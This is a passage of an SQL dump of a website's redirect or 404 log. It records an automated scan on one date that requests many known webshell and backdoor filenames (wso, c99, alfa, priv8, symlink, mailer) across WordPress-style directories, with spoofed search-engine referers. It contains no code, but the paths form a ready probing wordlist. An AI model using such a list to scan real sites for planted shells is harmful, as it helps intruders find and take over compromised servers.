00:00:00',301),(51938,'http://3s-technologies.com.tr/en/wp-content/alex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:01:16','0000-00-00 00:00:00',301),(51939,'http://3s-technologies.com.tr/en/wp-content/anone.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:01:18','0000-00-00 00:00:00',301),(51940,'http://3s-technologies.com.tr/en/wp-content/wp-configer.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:01:19','0000-00-00 00:00:00',301),(51941,'http://3s-technologies.com.tr/en/wp-content/wp-ad.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:01:20','0000-00-00 00:00:00',301),(51942,'http://3s-technologies.com.tr/en/wp-content/send.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:01:21','0000-00-00 00:00:00',301),(51943,'http://3s-technologies.com.tr/en/wp-content/.wp-cache.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:01:22','0000-00-00 00:00:00',301),(51944,'http://3s-technologies.com.tr/en/wp-content/sendmail.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:01:23','0000-00-00 00:00:00',301),(51945,'http://3s-technologies.com.tr/en/wp-content/rahma.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:01:24','0000-00-00 00:00:00',301),(51946,'http://3s-technologies.com.tr/en/wp-content/nasgor.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:01:25','0000-00-00 00:00:00',301),(51947,'http://3s-technologies.com.tr/en/wp-content/wp-confirm.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:01:26','0000-00-00 00:00:00',301),(51948,'http://3s-technologies.com.tr/en/wp-content/alfa123.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:01:27','0000-00-00 00:00:00',301),(51949,'http://3s-technologies.com.tr/en/wp-content/wp-one.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:01:30','0000-00-00 00:00:00',301),(51950,'http://3s-technologies.com.tr/en/wp-content/wso1337.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:01:31','0000-00-00 00:00:00',301),(51951,'http://3s-technologies.com.tr/en/image/wp-22.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:01:32','0000-00-00 00:00:00',301),(51952,'http://3s-technologies.com.tr/en/image/1234.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:01:33','0000-00-00 00:00:00',301),(51953,'http://3s-technologies.com.tr/en/image/asdasd.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:01:34','0000-00-00 00:00:00',301),(51954,'http://3s-technologies.com.tr/en/image/0byte.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:01:36','0000-00-00 00:00:00',301),(51955,'http://3s-technologies.com.tr/en/image/image/fw.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:01:37','0000-00-00 00:00:00',301),(51956,'http://3s-technologies.com.tr/en/image/sym.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:01:38','0000-00-00 00:00:00',301),(51957,'http://3s-technologies.com.tr/en/image/sym403.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:01:38','0000-00-00 00:00:00',301),(51958,'http://3s-technologies.com.tr/en/image/xl.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:01:39','0000-00-00 00:00:00',301),(51959,'http://3s-technologies.com.tr/en/image/symlink.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:01:40','0000-00-00 00:00:00',301),(51960,'http://3s-technologies.com.tr/en/image/404.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:01:41','0000-00-00 00:00:00',301),(51961,'http://3s-technologies.com.tr/en/image/403.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:01:42','0000-00-00 00:00:00',301),(51962,'http://3s-technologies.com.tr/en/image/up.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:01:43','0000-00-00 00:00:00',301),(51963,'http://3s-technologies.com.tr/en/image/c99.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:01:44','0000-00-00 00:00:00',301),(51964,'http://3s-technologies.com.tr/en/image/xxx.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:01:45','0000-00-00 00:00:00',301),(51965,'http://3s-technologies.com.tr/en/image/ok.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:01:46','0000-00-00 00:00:00',301),(51966,'http://3s-technologies.com.tr/en/image/0.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:01:47','0000-00-00 00:00:00',301),(51967,'http://3s-technologies.com.tr/en/image/x.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:01:47','0000-00-00 00:00:00',301),(51968,'http://3s-technologies.com.tr/en/image/xx.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:01:48','0000-00-00 00:00:00',301),(51969,'http://3s-technologies.com.tr/en/image/a.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:02:02','0000-00-00 00:00:00',301),(51970,'http://3s-technologies.com.tr/en/image/z.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:02:02','0000-00-00 00:00:00',301),(51971,'http://3s-technologies.com.tr/en/image/e.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:02:03','0000-00-00 00:00:00',301),(51972,'http://3s-technologies.com.tr/en/image/r.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:02:04','0000-00-00 00:00:00',301),(51973,'http://3s-technologies.com.tr/en/image/t.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:02:05','0000-00-00 00:00:00',301),(51974,'http://3s-technologies.com.tr/en/image/y.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:02:06','0000-00-00 00:00:00',301),(51975,'http://3s-technologies.com.tr/en/image/u.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:02:07','0000-00-00 00:00:00',301),(51976,'http://3s-technologies.com.tr/en/image/i.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:02:08','0000-00-00 00:00:00',301),(51977,'http://3s-technologies.com.tr/en/image/o.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:02:09','0000-00-00 00:00:00',301),(51978,'http://3s-technologies.com.tr/en/image/p.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:02:10','0000-00-00 00:00:00',301),(51979,'http://3s-technologies.com.tr/en/image/q.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:02:11','0000-00-00 00:00:00',301),(51980,'http://3s-technologies.com.tr/en/image/s.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:02:12','0000-00-00 00:00:00',301),(51981,'http://3s-technologies.com.tr/en/image/d.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:02:12','0000-00-00 00:00:00',301),(51982,'http://3s-technologies.com.tr/en/image/f.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:02:13','0000-00-00 00:00:00',301),(51983,'http://3s-technologies.com.tr/en/image/g.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:02:14','0000-00-00 00:00:00',301),(51984,'http://3s-technologies.com.tr/en/image/h.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:02:15','0000-00-00 00:00:00',301),(51985,'http://3s-technologies.com.tr/en/image/j.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:02:16','0000-00-00 00:00:00',301),(51986,'http://3s-technologies.com.tr/en/image/k.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:02:17','0000-00-00 00:00:00',301),(51987,'http://3s-technologies.com.tr/en/image/l.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:02:18','0000-00-00 00:00:00',301),(51988,'http://3s-technologies.com.tr/en/image/m.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:02:19','0000-00-00 00:00:00',301),(51989,'http://3s-technologies.com.tr/en/image/w.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:02:20','0000-00-00 00:00:00',301),(51990,'http://3s-technologies.com.tr/en/image/v.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:02:20','0000-00-00 00:00:00',301),(51991,'http://3s-technologies.com.tr/en/image/n.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:02:21','0000-00-00 00:00:00',301),(51992,'http://3s-technologies.com.tr/en/image/b.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:02:22','0000-00-00 00:00:00',301),(51993,'http://3s-technologies.com.tr/en/image/c.php',NULL,'https://www.google.co.uk/','',7,0,'2025-12-20 05:02:23','0000-00-00 00:00:00',301),(51994,'http://3s-technologies.com.tr/en/image/wp-wso.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:02:24','0000-00-00 00:00:00',301),(51995,'http://3s-technologies.com.tr/en/image/priv8.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:02:25','0000-00-00 00:00:00',301),(51996,'http://3s-technologies.com.tr/en/image/minimo.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:02:26','0000-00-00 00:00:00',301),(51997,'http://3s-technologies.com.tr/en/image/v3.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:02:27','0000-00-00 00:00:00',301),(51998,'http://3s-technologies.com.tr/en/image/v5.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:02:28','0000-00-00 00:00:00',301),(51999,'http://3s-technologies.com.tr/en/image/www.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:02:29','0000-00-00 00:00:00',301),(52000,'http://3s-technologies.com.tr/en/image/100.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:02:29','0000-00-00 00:00:00',301),(52001,'http://3s-technologies.com.tr/en/image/777.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:02:31','0000-00-00 00:00:00',301),(52002,'http://3s-technologies.com.tr/en/image/defau1t.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:02:32','0000-00-00 00:00:00',301),(52003,'http://3s-technologies.com.tr/en/image/xox.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:02:33','0000-00-00 00:00:00',301),(52004,'http://3s-technologies.com.tr/en/image/new.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:02:34','0000-00-00 00:00:00',301),(52005,'http://3s-technologies.com.tr/en/image/wi.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:02:35','0000-00-00 00:00:00',301),(52006,'http://3s-technologies.com.tr/en/image/mar.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:02:36','0000-00-00 00:00:00',301),(52007,'http://3s-technologies.com.tr/en/image/root.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:02:37','0000-00-00 00:00:00',301),(52008,'http://3s-technologies.com.tr/en/image/nee.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:02:38','0000-00-00 00:00:00',301),(52009,'http://3s-technologies.com.tr/en/image/ws.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:02:39','0000-00-00 00:00:00',301),(52010,'http://3s-technologies.com.tr/en/image/lol.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:02:40','0000-00-00 00:00:00',301),(52011,'http://3s-technologies.com.tr/en/image/haxor.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:02:43','0000-00-00 00:00:00',301),(52012,'http://3s-technologies.com.tr/en/image/foxwsov1.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:02:46','0000-00-00 00:00:00',301),(52013,'http://3s-technologies.com.tr/en/image/alf.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:02:46','0000-00-00 00:00:00',301),(52014,'http://3s-technologies.com.tr/en/image/bb.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:02:47','0000-00-00 00:00:00',301),(52015,'http://3s-technologies.com.tr/en/image/lf.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:02:48','0000-00-00 00:00:00',301),(52016,'http://3s-technologies.com.tr/en/image/wso.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:02:49','0000-00-00 00:00:00',301),(52017,'http://3s-technologies.com.tr/en/image/if.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:02:51','0000-00-00 00:00:00',301),(52018,'http://3s-technologies.com.tr/en/image/kk.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:02:52','0000-00-00 00:00:00',301),(52019,'http://3s-technologies.com.tr/en/image/mrjn.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:02:53','0000-00-00 00:00:00',301),(52020,'http://3s-technologies.com.tr/en/image/kn.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:02:54','0000-00-00 00:00:00',301),(52021,'http://3s-technologies.com.tr/en/image/3301.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:02:54','0000-00-00 00:00:00',301),(52022,'http://3s-technologies.com.tr/en/image/alex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:02:55','0000-00-00 00:00:00',301),(52023,'http://3s-technologies.com.tr/en/image/mailer.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:02:56','0000-00-00 00:00:00',301),(52024,'http://3s-technologies.com.tr/en/image/anone.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:02:57','0000-00-00 00:00:00',301),(52025,'http://3s-technologies.com.tr/en/image/wp-configer.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:02:58','0000-00-00 00:00:00',301),(52026,'http://3s-technologies.com.tr/en/image/wp-ad.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:02:59','0000-00-00 00:00:00',301),(52027,'http://3s-technologies.com.tr/en/image/send.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:03:00','0000-00-00 00:00:00',301),(52028,'http://3s-technologies.com.tr/en/image/.wp-cache.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:03:01','0000-00-00 00:00:00',301),(52029,'http://3s-technologies.com.tr/en/image/sendmail.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:03:02','0000-00-00 00:00:00',301),(52030,'http://3s-technologies.com.tr/en/image/rahma.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:03:03','0000-00-00 00:00:00',301),(52031,'http://3s-technologies.com.tr/en/image/nasgor.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:03:04','0000-00-00 00:00:00',301),(52032,'http://3s-technologies.com.tr/en/image/wp-confirm.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:03:04','0000-00-00 00:00:00',301),(52033,'http://3s-technologies.com.tr/en/image/alfa123.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:03:05','0000-00-00 00:00:00',301),(52034,'http://3s-technologies.com.tr/en/image/bypass.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:03:07','0000-00-00 00:00:00',301),(52035,'http://3s-technologies.com.tr/en/image/wp-one.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:03:08','0000-00-00 00:00:00',301),(52036,'http://3s-technologies.com.tr/en/image/alexus.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:03:09','0000-00-00 00:00:00',301),(52037,'http://3s-technologies.com.tr/en/image/wso1337.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:03:10','0000-00-00 00:00:00',301),(52038,'http://3s-technologies.com.tr/en/images/wp-22.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:03:11','0000-00-00 00:00:00',301),(52039,'http://3s-technologies.com.tr/en/images/1234.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:03:12','0000-00-00 00:00:00',301),(52040,'http://3s-technologies.com.tr/en/images/asdasd.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:03:13','0000-00-00 00:00:00',301),(52041,'http://3s-technologies.com.tr/en/images/0byte.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:03:14','0000-00-00 00:00:00',301),(52042,'http://3s-technologies.com.tr/en/images/images/fw.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:03:15','0000-00-00 00:00:00',301),(52043,'http://3s-technologies.com.tr/en/images/xl.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:03:18','0000-00-00 00:00:00',301),(52044,'http://3s-technologies.com.tr/en/images/symlink.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:03:19','0000-00-00 00:00:00',301),(52045,'http://3s-technologies.com.tr/en/images/up.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:03:21','0000-00-00 00:00:00',301),(52046,'http://3s-technologies.com.tr/en/images/xxx.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:03:23','0000-00-00 00:00:00',301),(52047,'http://3s-technologies.com.tr/en/images/ok.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:03:24','0000-00-00 00:00:00',301),(52048,'http://3s-technologies.com.tr/en/images/0.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:03:25','0000-00-00 00:00:00',301),(52049,'http://3s-technologies.com.tr/en/images/xx.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:03:27','0000-00-00 00:00:00',301),(52050,'http://3s-technologies.com.tr/en/images/a.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:03:40','0000-00-00 00:00:00',301),(52051,'http://3s-technologies.com.tr/en/images/z.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:03:41','0000-00-00 00:00:00',301),(52052,'http://3s-technologies.com.tr/en/images/e.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:03:42','0000-00-00 00:00:00',301),(52053,'http://3s-technologies.com.tr/en/images/r.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:03:43','0000-00-00 00:00:00',301),(52054,'http://3s-technologies.com.tr/en/images/t.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:03:43','0000-00-00 00:00:00',301),(52055,'http://3s-technologies.com.tr/en/images/y.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:03:44','0000-00-00 00:00:00',301),(52056,'http://3s-technologies.com.tr/en/images/u.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:03:45','0000-00-00 00:00:00',301),(52057,'http://3s-technologies.com.tr/en/images/i.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:03:46','0000-00-00 00:00:00',301),(52058,'http://3s-technologies.com.tr/en/images/o.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:03:47','0000-00-00 00:00:00',301),(52059,'http://3s-technologies.com.tr/en/images/p.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:03:48','0000-00-00 00:00:00',301),(52060,'http://3s-technologies.com.tr/en/images/q.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:03:49','0000-00-00 00:00:00',301),(52061,'http://3s-technologies.com.tr/en/images/s.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:03:50','0000-00-00 00:00:00',301),(52062,'http://3s-technologies.com.tr/en/images/d.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:03:51','0000-00-00 00:00:00',301),(52063,'http://3s-technologies.com.tr/en/images/g.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:03:53','0000-00-00 00:00:00',301),(52064,'http://3s-technologies.com.tr/en/images/h.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:03:53','0000-00-00 00:00:00',301),(52065,'http://3s-technologies.com.tr/en/images/j.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:03:54','0000-00-00 00:00:00',301),(52066,'http://3s-technologies.com.tr/en/images/k.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:03:55','0000-00-00 00:00:00',301),(52067,'http://3s-technologies.com.tr/en/images/l.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:03:56','0000-00-00 00:00:00',301),(52068,'http://3s-technologies.com.tr/en/images/m.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:03:57','0000-00-00 00:00:00',301),(52069,'http://3s-technologies.com.tr/en/images/w.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:03:58','0000-00-00 00:00:00',301),(52070,'http://3s-technologies.com.tr/en/images/v.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:03:59','0000-00-00 00:00:00',301),(52071,'http://3s-technologies.com.tr/en/images/n.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:03:59','0000-00-00 00:00:00',301),(52072,'http://3s-technologies.com.tr/en/images/b.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:04:00','0000-00-00 00:00:00',301),(52073,'http://3s-technologies.com.tr/en/images/c.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:04:01','0000-00-00 00:00:00',301),(52074,'http://3s-technologies.com.tr/en/images/wp-wso.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:04:02','0000-00-00 00:00:00',301),(52075,'http://3s-technologies.com.tr/en/images/priv8.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:04:03','0000-00-00 00:00:00',301),(52076,'http://3s-technologies.com.tr/en/images/minimo.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:04:04','0000-00-00 00:00:00',301),(52077,'http://3s-technologies.com.tr/en/images/v3.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:04:04','0000-00-00 00:00:00',301),(52078,'http://3s-technologies.com.tr/en/images/v5.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:04:05','0000-00-00 00:00:00',301),(52079,'http://3s-technologies.com.tr/en/images/www.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:04:06','0000-00-00 00:00:00',301),(52080,'http://3s-technologies.com.tr/en/images/100.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:04:07','0000-00-00 00:00:00',301),(52081,'http://3s-technologies.com.tr/en/images/777.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:04:08','0000-00-00 00:00:00',301),(52082,'http://3s-technologies.com.tr/en/images/defau1t.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:04:09','0000-00-00 00:00:00',301),(52083,'http://3s-technologies.com.tr/en/images/xox.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:04:10','0000-00-00 00:00:00',301),(52084,'http://3s-technologies.com.tr/en/images/new.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:04:11','0000-00-00 00:00:00',301),(52085,'http://3s-technologies.com.tr/en/images/wi.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:04:11','0000-00-00 00:00:00',301),(52086,'http://3s-technologies.com.tr/en/images/nee.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:04:13','0000-00-00 00:00:00',301),(52087,'http://3s-technologies.com.tr/en/images/ws.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:04:14','0000-00-00 00:00:00',301),(52088,'http://3s-technologies.com.tr/en/images/lol.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:04:15','0000-00-00 00:00:00',301),(52089,'http://3s-technologies.com.tr/en/images/haxor.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:04:18','0000-00-00 00:00:00',301),(52090,'http://3s-technologies.com.tr/en/images/foxwsov1.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:04:20','0000-00-00 00:00:00',301),(52091,'http://3s-technologies.com.tr/en/images/alf.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:04:21','0000-00-00 00:00:00',301),(52092,'http://3s-technologies.com.tr/en/images/bb.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:04:22','0000-00-00 00:00:00',301),(52093,'http://3s-technologies.com.tr/en/images/lf.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:04:23','0000-00-00 00:00:00',301),(52094,'http://3s-technologies.com.tr/en/images/hello.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:04:24','0000-00-00 00:00:00',301),(52095,'http://3s-technologies.com.tr/en/images/if.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:04:25','0000-00-00 00:00:00',301),(52096,'http://3s-technologies.com.tr/en/images/kk.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:04:26','0000-00-00 00:00:00',301),(52097,'http://3s-technologies.com.tr/en/images/mrjn.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:04:27','0000-00-00 00:00:00',301),(52098,'http://3s-technologies.com.tr/en/images/kn.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:04:28','0000-00-00 00:00:00',301),(52099,'http://3s-technologies.com.tr/en/images/3301.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:04:29','0000-00-00 00:00:00',301),(52100,'http://3s-technologies.com.tr/en/images/alex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:04:30','0000-00-00 00:00:00',301),(52101,'http://3s-technologies.com.tr/en/images/mailer.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:04:31','0000-00-00 00:00:00',301),(52102,'http://3s-technologies.com.tr/en/images/anone.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:04:32','0000-00-00 00:00:00',301),(52103,'http://3s-technologies.com.tr/en/images/wp-configer.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:04:33','0000-00-00 00:00:00',301),(52104,'http://3s-technologies.com.tr/en/images/wp-ad.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:04:33','0000-00-00 00:00:00',301),(52105,'http://3s-technologies.com.tr/en/images/send.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:04:34','0000-00-00 00:00:00',301),(52106,'http://3s-technologies.com.tr/en/images/.wp-cache.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:04:35','0000-00-00 00:00:00',301),(52107,'http://3s-technologies.com.tr/en/images/sendmail.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:04:36','0000-00-00 00:00:00',301),(52108,'http://3s-technologies.com.tr/en/images/rahma.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:04:37','0000-00-00 00:00:00',301),(52109,'http://3s-technologies.com.tr/en/images/nasgor.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:04:38','0000-00-00 00:00:00',301),(52110,'http://3s-technologies.com.tr/en/images/wp-confirm.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:04:39','0000-00-00 00:00:00',301),(52111,'http://3s-technologies.com.tr/en/images/alfa123.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:04:40','0000-00-00 00:00:00',301),(52112,'http://3s-technologies.com.tr/en/images/upload.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:04:40','0000-00-00 00:00:00',301),(52113,'http://3s-technologies.com.tr/en/images/wp-one.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:04:42','0000-00-00 00:00:00',301),(52114,'http://3s-technologies.com.tr/en/images/alexus.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:04:43','0000-00-00 00:00:00',301),(52115,'http://3s-technologies.com.tr/en/images/wso1337.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:04:44','0000-00-00 00:00:00',301),(52116,'http://3s-technologies.com.tr/en/cgi-bin/wp-login.php',NULL,'https://www.google.de/','',1,0,'2025-12-20 05:04:46','0000-00-00 00:00:00',301),(52117,'http://3s-technologies.com.tr/en/wp-content/cong.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:04:47','0000-00-00 00:00:00',301),(52118,'http://3s-technologies.com.tr/en/1234.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:04:49','0000-00-00 00:00:00',301),(52119,'http://3s-technologies.com.tr/en/asdasd.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:04:50','0000-00-00 00:00:00',301),(52120,'http://3s-technologies.com.tr/en/p-content/themes/index.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:05:13','0000-00-00 00:00:00',301),(52121,'http://3s-technologies.com.tr/en/wp-admin/images/autoload_classmap.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:05:17','0000-00-00 00:00:00',301),(52122,'http://3s-technologies.com.tr/en/wp-admin/includes/autoload_classmap.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:05:18','0000-00-00 00:00:00',301),(52123,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/autoload_classmap.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:05:19','0000-00-00 00:00:00',301),(52124,'http://3s-technologies.com.tr/en/wp-admin/maint/autoload_classmap.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:05:21','0000-00-00 00:00:00',301),(52125,'http://3s-technologies.com.tr/en/wp-admin/network/autoload_classmap.php',NULL,'https://www.google.fr/','',7,0,'2025-12-20 05:05:21','0000-00-00 00:00:00',301),(52126,'http://3s-technologies.com.tr/en/wp-admin/user/autoload_classmap.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:05:22','0000-00-00 00:00:00',301),(52127,'http://3s-technologies.com.tr/en/wp-content/uploads/autoload_classmap.php',NULL,'https://www.google.de/','',3,0,'2025-12-20 05:05:24','0000-00-00 00:00:00',301),(52128,'http://3s-technologies.com.tr/en/wp-content/languages/themes/autoload_classmap.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:05:27','0000-00-00 